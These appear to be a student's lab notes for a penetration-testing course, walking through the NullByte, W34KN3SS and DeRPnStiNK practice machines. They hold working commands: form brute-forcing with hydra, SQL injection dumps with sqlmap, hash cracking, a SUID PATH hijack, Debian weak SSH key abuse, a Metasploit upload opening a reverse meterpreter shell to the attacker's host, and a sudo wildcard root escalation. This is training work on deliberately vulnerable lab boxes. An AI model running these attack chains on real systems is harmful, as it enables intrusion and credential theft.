
ACCE Notes

8/11

ports open: 80, 111, 777

http://192.168.0.25/

http://192.168.0.25/kzMb5nVYJw/index.php

http://192.168.0.25/kzMb5nVYJw/420search.php?usrtosearch=


Rocheston:~$ sudo hydra 192.168.0.25 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^&: invalid key" -P /usr/share/wordlists/rockyou.txt -la -t 16 -w 30
key found: elite (the form rejects wrong keys with "invalid key", which is the failure string given to hydra)

Rocheston:~$ sudo sqlmap -u http://192.168.0.25/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth --dump --batch
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.2#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:12:14 /2023-11-08/

[07:12:14] [INFO] testing connection to the target URL
[07:12:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:12:14] [INFO] testing if the target URL content is stable
[07:12:15] [INFO] target URL content is stable
[07:12:15] [INFO] testing if GET parameter 'usrtosearch' is dynamic
[07:12:15] [WARNING] GET parameter 'usrtosearch' does not appear to be dynamic
[07:12:15] [INFO] heuristic (basic) test shows that GET parameter 'usrtosearch' might be injectable (possible DBMS: 'MySQL')
[07:12:15] [INFO] testing for SQL injection on GET parameter 'usrtosearch'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[07:12:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:12:15] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:12:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:12:15] [WARNING] reflective value(s) found and filtering out
[07:12:15] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:12:16] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[07:12:16] [INFO] GET parameter 'usrtosearch' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="ID")
[07:12:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[07:12:16] [INFO] GET parameter 'usrtosearch' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable 
[07:12:16] [INFO] testing 'MySQL inline queries'
[07:12:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[07:12:16] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[07:12:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[07:12:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[07:12:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[07:12:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[07:12:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[07:12:16] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[07:12:36] [INFO] GET parameter 'usrtosearch' appears to be 'MySQL >= 5.0.12 OR time-based blind' injectable 
[07:12:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:12:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[07:12:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:12:36] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[07:12:36] [INFO] target URL appears to have 3 columns in query
[07:12:36] [INFO] target URL appears to be UNION injectable with 3 columns
[07:12:36] [INFO] GET parameter 'usrtosearch' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[07:12:36] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'usrtosearch' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 161 HTTP(s) requests:
---
Parameter: usrtosearch (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: usrtosearch=1" OR NOT 2922=2922#

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: usrtosearch=1" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178787a71,(SELECT (ELT(2894=2894,1))),0x717a627171,0x78))s), 8446744073709551610, 8446744073709551610)))-- GUFh

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: usrtosearch=1" OR SLEEP(5)-- PvNQ

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: usrtosearch=1" UNION ALL SELECT NULL,CONCAT(0x7178787a71,0x4170414b704d42586147574d6c78514c79504954755371506f464b54796851696777794555477358,0x717a627171),NULL#
---
[07:12:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[07:12:36] [INFO] fetching tables for database: 'seth'
[07:12:36] [INFO] fetching columns for table 'users' in database 'seth'
[07:12:36] [INFO] fetching entries for table 'users' in database 'seth'
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass                                        | user   | position   |
+----+---------------------------------------------+--------+------------+
| 1  | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank>    |
| 2  | --not allowed--                             | isis   | employee   |
+----+---------------------------------------------+--------+------------+

Rocheston:~/rcce$ sudo echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 -d
c6d6bd7ebf806f43c76acc3681703b81base64: invalid input
(the "invalid input" is only the missing "=" padding; the 32 hex characters before it are the decoded value, a raw MD5 digest, printed without a trailing newline)

Rocheston:~/rcce$ echo "c6d6bd7ebf806f43c76acc3681703b81" > hashpass.txt
Rocheston:~/rcce$ cat hashpass.txt 
c6d6bd7ebf806f43c76acc3681703b81

Rocheston:~/rcce$ cd /pentest/password-recovery/johntheripper
Rocheston:/pentest/password-recovery/johntheripper$ sudo ./john /home/rocheston/rcce/hashpass --format=raw-md5 --wordlist:/usr/share/wordlists/rockyou.txt
stat: /home/rocheston/rcce/hashpass: No such file or directory
Rocheston:/pentest/password-recovery/johntheripper$ sudo ./john /home/rocheston/rcce/hashpass.txt --format=raw-md5 --wordlist:/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
omega   (cracked raw-MD5 password for ramses)

Rocheston:~/rcce$ sudo ssh ramses@192.168.0.25 -p 777
The authenticity of host '[192.168.0.25]:777 ([192.168.0.25]:777)' can't be established.
ECDSA key fingerprint is SHA256:H/Y/TKggtnCfMGz457Jy6F6tUZPrvEDD62dP9A3ZIkU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.0.25]:777' (ECDSA) to the list of known hosts.
ramses@192.168.0.25's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs
ramses@NullByte:~$ cd /var/www/backup
ramses@NullByte:/var/www/backup$ ./procwatch
  PID TTY          TIME CMD
 1405 pts/0    00:00:00 procwatch
 1406 pts/0    00:00:00 sh
 1407 pts/0    00:00:00 ps
ramses@NullByte:/var/www/backup$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:/var/www/backup$ cd /root
-bash: cd: /root: Permission denied
ramses@NullByte:/var/www/backup$ echo "/bin/sh" > ps
ramses@NullByte:/var/www/backup$ chmod 777 ps
ramses@NullByte:/var/www/backup$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
ramses@NullByte:/var/www/backup$ export PATH=.:$PATH

ramses@NullByte:/var/www/backup$ echo $PATH
.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
ramses@NullByte:/var/www/backup$ ./procwatch
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# cd /root
# ls    
proof.txt
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats. 
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com


USE THIS PGP PUBLIC KEY

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0
[PGP key block omitted]
-----END PGP PUBLIC KEY BLOCK-----

# 
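
Why procwatch fell: it is SUID root and, as the process tree above shows (procwatch -> sh -> ps), it runs `ps` through sh without an absolute path, so the shell resolves `ps` via the caller's PATH, and PATH begins with "." after the export. Two caveats worth keeping: the fake `ps` has no shebang and works only because sh falls back to interpreting an ENOEXEC file as a script; and `/bin/sh` on Debian 8 is dash, which keeps the inherited euid=0 seen in the `id` output, whereas bash would have reset the effective uid to the real uid unless started with -p. The code below is an added example, not code from the notes or from the NullByte box: it reproduces the hijack in a scratch directory against a stand-in for procwatch's call, and beside it the invocation that is immune to it (absolute path, fixed PATH, minimal environment). It assumes a POSIX host with /bin/sh; if procps is not installed the hardened call reports that instead of running anything.

```python
"""Added example (not from the notes or the NullByte box): reproduce the
procwatch PATH hijack in a scratch directory and show the immune invocation.
Assumes a POSIX host with /bin/sh; the 'run_*' calls stand in for the SUID binary."""
import os
import shutil
import subprocess
import tempfile


def plant_fake_ps(directory):
    """Attacker step from the notes (echo "/bin/sh" > ps; chmod 777 ps), except
    that this fake ps only announces itself instead of spawning a shell."""
    fake = os.path.join(directory, "ps")
    with open(fake, "w") as f:
        f.write("#!/bin/sh\necho HIJACKED\n")
    os.chmod(fake, 0o755)
    return fake


def run_vulnerable(directory):
    """What procwatch does: hand 'ps' to /bin/sh, which resolves it through the
    caller's PATH. With '.' first in PATH and the fake ps in the cwd, the fake wins."""
    env = {"PATH": "." + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")}
    done = subprocess.run(["/bin/sh", "-c", "ps"], cwd=directory, env=env,
                          capture_output=True, text=True)
    return done.stdout.strip()


def run_hardened(directory):
    """Same task done safely: resolve the tool against a fixed, trusted PATH, run it
    by absolute path, and pass a minimal environment. The planted ps is never seen."""
    trusted = "/usr/bin:/bin"
    ps = shutil.which("ps", path=trusted)
    if ps is None:                      # e.g. a minimal container without procps
        return "ps-not-present"
    done = subprocess.run([ps, "-o", "comm=", "-p", str(os.getpid())], cwd=directory,
                          env={"PATH": trusted}, capture_output=True, text=True)
    return done.stdout.strip() or "ps-no-output"


def demo():
    """Plant the fake ps, run both variants from that directory, return the outputs."""
    directory = tempfile.mkdtemp()
    try:
        plant_fake_ps(directory)
        return {"vulnerable": run_vulnerable(directory),
                "hardened": run_hardened(directory)}
    finally:
        shutil.rmtree(directory)


if __name__ == "__main__":
    print(demo())
```

For a real SUID binary the same fix in C is execve() on an absolute path with an envp you built yourself (or dropping privileges with setresuid() before spawning anything); system() and popen() inherit the caller's PATH and IFS and should not appear in privileged code at all.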

31/10

RCCE Lvl2

Lab 17:

ifconfig
vboxnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.5.103  netmask 255.255.255.0  broadcast 192.168.5.255

Rocheston:~$ sudo arp-scan 192.168.5.0/24 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.25	08:00:27:07:a0:19	Cadmus Computer Systems
192.168.5.103	08:00:27:9d:09:41	Cadmus Computer Systems

Rocheston:~$ sudo nmap -sC -sV 192.168.5.25
ports open: 22,8000

Lab 16:

ifconfig
vboxnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.5.132  netmask 255.255.255.0  broadcast 192.168.5.255

Rocheston:~$ sudo arp-scan 192.168.5.0/24 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.25	08:00:27:07:a0:19	Cadmus Computer Systems
192.168.5.132	08:00:27:0a:75:ad	Cadmus Computer Systems

Rocheston:~$ sudo nmap -sC -sV 192.168.5.25
ports open: 22,80,443

Rocheston:~$ sudo dirb http://192.168.5.25
==> DIRECTORY: http://192.168.5.25/test/                                       
==> DIRECTORY: http://192.168.5.25/uploads/

Rocheston:~$ sudo nano /etc/hosts
192.168.5.25    weakness.jth

Rocheston:~$ sudo dirb http://weakness.jth
---- Entering directory: http://weakness.jth/private/ ----

opening stuff in browser:

http://weakness.jth/private/files/notes.txt
this key was generated by openssl 0.9.8c-1

Rocheston:~$ sudo searchsploit openssl 0.9.8c-1
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Deriv | linux/remote/5622.txt
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Deriv | linux/remote/5632.rb
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Deriv | linux/remote/5720.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Rocheston:~$ sudo searchsploit -m 5622
  Exploit: OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Perl)
      URL: https://www.exploit-db.com/exploits/5622
     Path: /usr/share/exploitdb/exploits/linux/remote/5622.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /home/rocheston/5622.txt
https://github.com/g0tmi1k/debian-ssh (pre-generated weak key set; the rsa/2048 directory searched below comes from it)

Rocheston:~/downloads/rsa/2048$ sudo grep -r "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster"
4161de56829de2fe64b9055711f531c1-2537.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster

4161de56829de2fe64b9055711f531c1-2537.pub
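
The grep above matches the harvested key by its full text, comment included. A key can legitimately show up in authorized_keys with a different comment or extra whitespace, so matching on the key blob's fingerprint is more robust and lets you cross-check the hit with `ssh-keygen -lf`. The code below is an added example, not from the notes or the debian-ssh repository: it indexes a directory of candidate .pub files by OpenSSH SHA256 fingerprint and returns the path of the matching private key. It assumes the extracted set's layout (<name>.pub next to <name>), as in ~/downloads/rsa/2048; the keypairs written by build_demo_keyset are constructed placeholders with no real RSA material, present only so the example runs offline.

```python
"""Added example (not from the notes or debian-ssh): match a harvested public key
against a directory of candidate keypairs by OpenSSH SHA256 fingerprint.
Assumes <name>.pub next to <name>; demo keys are constructed placeholders."""
import base64
import hashlib
import os
import shutil
import tempfile

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def parse_pubkey(line):
    """Return (type, raw_blob) from an authorized_keys or .pub line, skipping
    any leading options and ignoring the trailing comment; None if unparsable."""
    fields = line.split()
    for i, field in enumerate(fields[:-1]):
        if field in KEY_TYPES:
            try:
                return field, base64.b64decode(fields[i + 1], validate=True)
            except ValueError:
                return None
    return None


def openssh_fingerprint(blob):
    """Same value `ssh-keygen -lf` prints: SHA-256 of the raw blob, base64, no padding."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def index_keyset(keyset_dir):
    """Map fingerprint -> private key path for every .pub file in the set."""
    index = {}
    for name in os.listdir(keyset_dir):
        if not name.endswith(".pub"):
            continue
        pub_path = os.path.join(keyset_dir, name)
        with open(pub_path) as f:
            for line in f:
                parsed = parse_pubkey(line)
                if parsed:
                    index[openssh_fingerprint(parsed[1])] = pub_path[:-4]
    return index


def find_private_key(target_line, keyset_dir):
    """Private key path whose public half matches target_line, else None.
    Comment and whitespace differences in the harvested line do not matter."""
    parsed = parse_pubkey(target_line)
    if parsed is None:
        return None
    return index_keyset(keyset_dir).get(openssh_fingerprint(parsed[1]))


def build_demo_keyset(directory, count=5):
    """Constructed stand-in for the extracted set: key-NNNN.pub plus an empty
    key-NNNN file; the blobs are base64 of a marker string, not RSA keys."""
    lines = []
    for i in range(count):
        blob = base64.b64encode(b"constructed key material %d" % i).decode()
        line = "ssh-rsa %s root@targetcluster\n" % blob
        name = "key-%04d" % i
        with open(os.path.join(directory, name + ".pub"), "w") as f:
            f.write(line)
        open(os.path.join(directory, name), "w").close()
        lines.append(line)
    return lines


def demo():
    """A harvested line with another comment and odd spacing must still hit
    key-0003; a blob outside the set must yield None."""
    directory = tempfile.mkdtemp()
    try:
        lines = build_demo_keyset(directory)
        blob3 = lines[3].split()[1]
        harvested = "ssh-rsa   %s   n30@W34KN3SS" % blob3
        hit = find_private_key(harvested, directory)
        stray = "ssh-rsa %s x" % base64.b64encode(b"not in set").decode()
        return {"hit": os.path.basename(hit) if hit else None,
                "miss": find_private_key(stray, directory)}
    finally:
        shutil.rmtree(directory)
```

Against the real set: `find_private_key(line, os.path.expanduser("~/downloads/rsa/2048"))` with `line` being the harvested authorized_keys entry; the returned path is the file to pass to `ssh -i`, as done below.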

Rocheston:~/downloads/rsa/2048$ sudo ssh -i 4161de56829de2fe64b9055711f531c1-2537 n30@192.168.5.25
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Tue Aug 14 13:29:20 2018 from 192.168.209.1

n30@W34KN3SS:~$ ls
code  user.txt
n30@W34KN3SS:~$ cat user.txt 
25e3cd678875b601425c9356c8039f68
n30@W34KN3SS:~$ file code
code: python 2.7 byte-compiled
n30@W34KN3SS:~$ cp code /var/www/html

Rocheston:~$ sudo wget http://192.168.5.25/code
--2023-10-31 08:29:15--  http://192.168.5.25/code
Connecting to 192.168.5.25:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1138 (1.1K)
Saving to: ‘code’

code                100%[===================>]   1.11K  --.-KB/s    in 0s      

2023-10-31 08:29:15 (121 MB/s) - ‘code’ saved [1138/1138]

Rocheston:~$ sudo mv code code.pyc
Rocheston:~$ sudo uncompyle6 code.pyc 
# uncompyle6 version 3.7.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.16 (default, Sep 20 2023, 07:59:17) 
# [GCC 8.3.0]
# Embedded file name: code.py
# Compiled at: 2018-05-08 11:50:54
import os, socket, time, hashlib
print ('[+]System Started at : {0}').format(time.ctime())
print '[+]This binary should generate unique hash for the hardcoded login info'
print '[+]Generating the hash ..'
inf = ''
inf += chr(ord('n'))
inf += chr(ord('3'))
inf += chr(ord('0'))
inf += chr(ord(':'))
inf += chr(ord('d'))
inf += chr(ord('M'))
inf += chr(ord('A'))
inf += chr(ord('S'))
inf += chr(ord('D'))
inf += chr(ord('N'))
inf += chr(ord('B'))
inf += chr(ord('!'))
inf += chr(ord('!'))
inf += chr(ord('#'))
inf += chr(ord('B'))
inf += chr(ord('!'))
inf += chr(ord('#'))
inf += chr(ord('!'))
inf += chr(ord('#'))
inf += chr(ord('3'))
inf += chr(ord('3'))
hashf = hashlib.sha256(inf + time.ctime()).hexdigest()
print ('[+]Your new hash is : {0}').format(hashf)
print '[+]Done'
# okay decompiling code.pyc

The chr(ord(...)) chain only concatenates literal characters: inf is "n30:dMASDNB!!#B!#!#33", i.e. the hardcoded login n30 with password dMASDNB!!#B!#!#33. The printed SHA-256 changes with time.ctime() and is not needed; the password is what sudo asks for below.

n30@W34KN3SS:~$ sudo -l
Matching Defaults entries for n30 on W34KN3SS:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User n30 may run the following commands on W34KN3SS:
    (ALL : ALL) ALL
n30@W34KN3SS:~$ ls
code  user.txt
n30@W34KN3SS:~$ sudo -i
root@W34KN3SS:~# ls
root.txt
root@W34KN3SS:~# cat root.txt 
a1d2fab76ec6af9b651d4053171e042e
root@W34KN3SS:~# 

28/10

RCCE Lvl2

Lab44: The aim of this exercise is to capture all the four flags.


Next part (the notes resume from the WordPress foothold; flags 1 and 2 are not recorded here)

msf6 > use exploit/unix/webapp/wp_slideshowgallery_upload 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set rhost 192.168.0.26
rhost => 192.168.0.26
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set lhost 192.168.0.102
lhost => 192.168.0.102
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /weblog
targeturi => /weblog
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user admin
wp_user => admin
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password admin
wp_password => admin
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > exploit

[*] Started reverse TCP handler on 192.168.0.102:4444 
[*] Trying to login as admin
[*] Trying to upload payload
[*] Uploading payload
[*] Calling uploaded file hokjeifo.php
[*] Sending stage (39860 bytes) to 192.168.0.26
[+] Deleted hokjeifo.php
[*] Meterpreter session 1 opened (192.168.0.102:4444 -> 192.168.0.26:54288 ) at 2023-10-28 00:04:17 -0400

meterpreter > shell
Process 2120 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
</html/weblog/wp-content/uploads/slideshow-gallery$ su stinky
Password: wedgie57

stinky@DeRPnStiNK:/var/www/html/weblog/wp-content/uploads/slideshow-gallery$ ls
cache  derp.png  elidumfy.php  jjtrmbtx.php
stinky@DeRPnStiNK:/var/www/html/weblog/wp-content/uploads/slideshow-gallery$ cd stinky
bash: cd: stinky: No such file or directory
stinky@DeRPnStiNK:/var/www/html/weblog/wp-content/uploads/slideshow-gallery$ cd
stinky@DeRPnStiNK:~$ ls
Desktop  Documents  Downloads  ftp
stinky@DeRPnStiNK:~$ cd Desktop/
stinky@DeRPnStiNK:~/Desktop$ ls
flag.txt
stinky@DeRPnStiNK:~/Desktop$ cat flag
cat: flag: No such file or directory
stinky@DeRPnStiNK:~/Desktop$ cat flag.txt 
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
stinky@DeRPnStiNK:~/Desktop$ cd ..
stinky@DeRPnStiNK:~$ cd Documents
stinky@DeRPnStiNK:~/Documents$ ls
derpissues.pcap
stinky@DeRPnStiNK:~/Documents$ cd ..
stinky@DeRPnStiNK:~$ cd Downloads
stinky@DeRPnStiNK:~/Downloads$ ls
stinky@DeRPnStiNK:~/Downloads$ ls -al
total 8
drwxr-xr-x  2 stinky stinky 4096 Nov 13  2017 .
drwx------ 12 stinky stinky 4096 Jan  9  2018 ..
stinky@DeRPnStiNK:~/Downloads$ cd ..
stinky@DeRPnStiNK:~$ cd ftp
stinky@DeRPnStiNK:~/ftp$ ls 
files
stinky@DeRPnStiNK:~/ftp$ cd files
stinky@DeRPnStiNK:~/ftp/files$ ls -al
total 24
drwxr-xr-x 5 stinky stinky  4096 Nov 12  2017 .
drwxr-xr-x 3 nobody nogroup 4096 Nov 12  2017 ..
drwxr-xr-x 2 stinky stinky  4096 Nov 12  2017 network-logs
drwxr-xr-x 3 stinky stinky  4096 Nov 12  2017 ssh
-rwxr-xr-x 1 root   root      17 Nov 12  2017 test.txt
drwxr-xr-x 2 root   root    4096 Nov 12  2017 tmp
stinky@DeRPnStiNK:~/ftp/files$ cd network-logs   
stinky@DeRPnStiNK:~/ftp/files/network-logs$ ls
derpissues.txt
stinky@DeRPnStiNK:~/ftp/files/network-logs$ derpissues.txt
derpissues.txt: command not found
stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
stinky@DeRPnStiNK:~/ftp/files/network-logs$ cd ../
stinky@DeRPnStiNK:~/ftp/files$ cd ssh/ssh/ssh/ssh/ssh/ssh/ssh
stinky@DeRPnStiNK:~/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh$ ls
key.txt
stinky@DeRPnStiNK:~/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh$ cat key
cat: key: No such file or directory
stinky@DeRPnStiNK:~/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh$ cat key.txt
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----
stinky@DeRPnStiNK:~/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh$ cd ~/ftp/files
stinky@DeRPnStiNK:~/ftp/files$ cp /home/stinky/Documents/derpissues.pcap .
stinky@DeRPnStiNK:~/ftp/files$ ls
derpissues.pcap  network-logs  ssh  test.txt  tmp
stinky@DeRPnStiNK:~/ftp/files$ cd /home
stinky@DeRPnStiNK:/home$ su mrderp
Password: derpderpderpderpderpderpderp

mrderp@DeRPnStiNK:/home$ ls
mrderp  stinky
mrderp@DeRPnStiNK:/home$ sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp

Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:/home$ cd ..
mrderp@DeRPnStiNK:/$ cd
mrderp@DeRPnStiNK:~$ mkdir binaries
mrderp@DeRPnStiNK:~$ cd binaries
mrderp@DeRPnStiNK:~/binaries$ cat <<EOF > derpy.sh
> #!/bin/bash
> bash -i
> EOF
mrderp@DeRPnStiNK:~/binaries$ ls
derpy.sh
mrderp@DeRPnStiNK:~/binaries$ chmod 777 derpy.sh
mrderp@DeRPnStiNK:~/binaries$ ls
derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
root@DeRPnStiNK:~/binaries# id
uid=0(root) gid=0(root) groups=0(root)
root@DeRPnStiNK:~/binaries# cd /root
root@DeRPnStiNK:/root# ls
Desktop  Documents  Downloads
root@DeRPnStiNK:/root# cd Desktop
root@DeRPnStiNK:/root/Desktop# ls
flag.txt
root@DeRPnStiNK:/root/Desktop# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo

Lab43: The aim of this exercise is to gain root access and spot the flag

